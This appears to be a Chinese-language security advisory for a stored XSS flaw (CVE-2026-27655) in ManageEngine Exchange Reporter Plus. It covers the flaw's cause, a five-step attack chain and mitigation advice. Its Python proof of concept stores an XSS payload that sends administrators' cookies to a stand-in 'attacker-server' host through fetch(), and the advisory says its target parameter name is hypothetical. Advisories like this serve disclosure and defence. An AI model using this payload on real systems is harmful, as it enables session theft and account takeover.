CVE-2026-27655 CVSS 7.3 高危

CVE-2026-27655 ManageEngine存储型XSS漏洞

披露日期: 2026-04-03

来源: 0fc0942c-577d-436f-ae8e-945763c79b02

漏洞信息

漏洞编号

CVE-2026-27655

漏洞类型

存储型跨站脚本 (Stored XSS)

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Zohocorp ManageEngine Exchange Reporter Plus

漏洞概述

Zohocorp ManageEngine Exchange Reporter Plus 5802之前的版本在“基于邮箱权限”报告中存在存储型XSS漏洞。由于应用程序未能充分过滤用户输入，攻击者可注入恶意脚本。当特权用户访问受影响的报告时，脚本将在其浏览器上下文中执行，可能导致窃取会话令牌或执行未授权操作，对系统机密性和完整性构成高风险。

技术细节

该漏洞属于存储型跨站脚本攻击（Stored XSS），存在于Zohocorp ManageEngine Exchange Reporter Plus的“基于邮箱权限”报告模块中。漏洞成因在于应用程序对用户提供的输入数据缺乏严格的过滤和转义处理。攻击者首先利用低权限账户登录系统，并在报告生成相关的参数或字段中植入恶意的JavaScript代码。该载荷被持久化存储在服务器数据库中。当具有更高权限的管理员或其他用户查看该特定报告时，服务器会直接将未经过滤的恶意代码返回给浏览器执行。由于攻击向量为网络（AV:N）且需要用户交互（UI:R），攻击者可借此窃取管理员的Session ID、Cookie等敏感信息，进而劫持会话并在系统中执行未授权操作，造成高保密性和完整性影响。

攻击链分析

STEP 1

1. 侦察与访问

攻击者发现目标运行的是Zohocorp ManageEngine Exchange Reporter Plus，并获取一个低权限账户（PR:L）。

STEP 2

2. 载荷注入

攻击者利用低权限账户，在“基于邮箱权限”报告功能的相关输入字段中注入恶意JavaScript代码（XSS Payload）。

STEP 3

3. 持久化存储

应用程序未能过滤恶意代码，将其存储在后端数据库中。此时漏洞已被触发，但尚未造成实质性危害。

STEP 4

4. 诱导触发

攻击者等待或诱导具有高权限的管理员用户查看该特定的“基于邮箱权限”报告（UI:R）。

STEP 5

5. 代码执行与窃取

管理员访问报告时，恶意脚本在浏览器中执行。攻击者利用此机会窃取管理员的Session Cookie或执行敏感操作（C:H/I:H）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (example)
target_url = "https://target-site/exchange-reports/showMailboxPermissions.do"

# Attacker's session cookie (low privilege)
cookies = {
    "JSESSIONID": "ATTACKER_SESSION_ID"
}

# Payload demonstrating Stored XSS
# This payload attempts to steal cookies when an admin views the report
xss_payload = '<img src=x onerror=fetch(\'http://attacker-server/?c=\'+document.cookie)>'

# Data to be sent in the request
# The specific parameter name 'mailboxName' is hypothetical based on the report description
payload_data = {
    "mailboxName": xss_payload,
    "reportType": "permissions"
}

try:
    # Send the malicious request to store the payload
    response = requests.post(target_url, data=payload_data, cookies=cookies, verify=False)
    
    if response.status_code == 200:
        print("[+] Payload injected successfully.")
        print("[*] Wait for an administrator to view the 'Permissions Based on Mailboxes' report.")
    else:
        print(f"[-] Injection failed. Status code: {response.status_code}")
        
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

Zohocorp ManageEngine Exchange Reporter Plus < 5802

防御指南

临时缓解措施

在升级补丁之前，建议限制对“基于邮箱权限”报告功能的访问权限，仅允许必要的信任用户访问。管理员应谨慎对待来源不明的报告请求，并在查看此类报告后立即注销会话。部署Web应用防火墙（WAF）规则以检测和阻断常见的XSS攻击向量。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表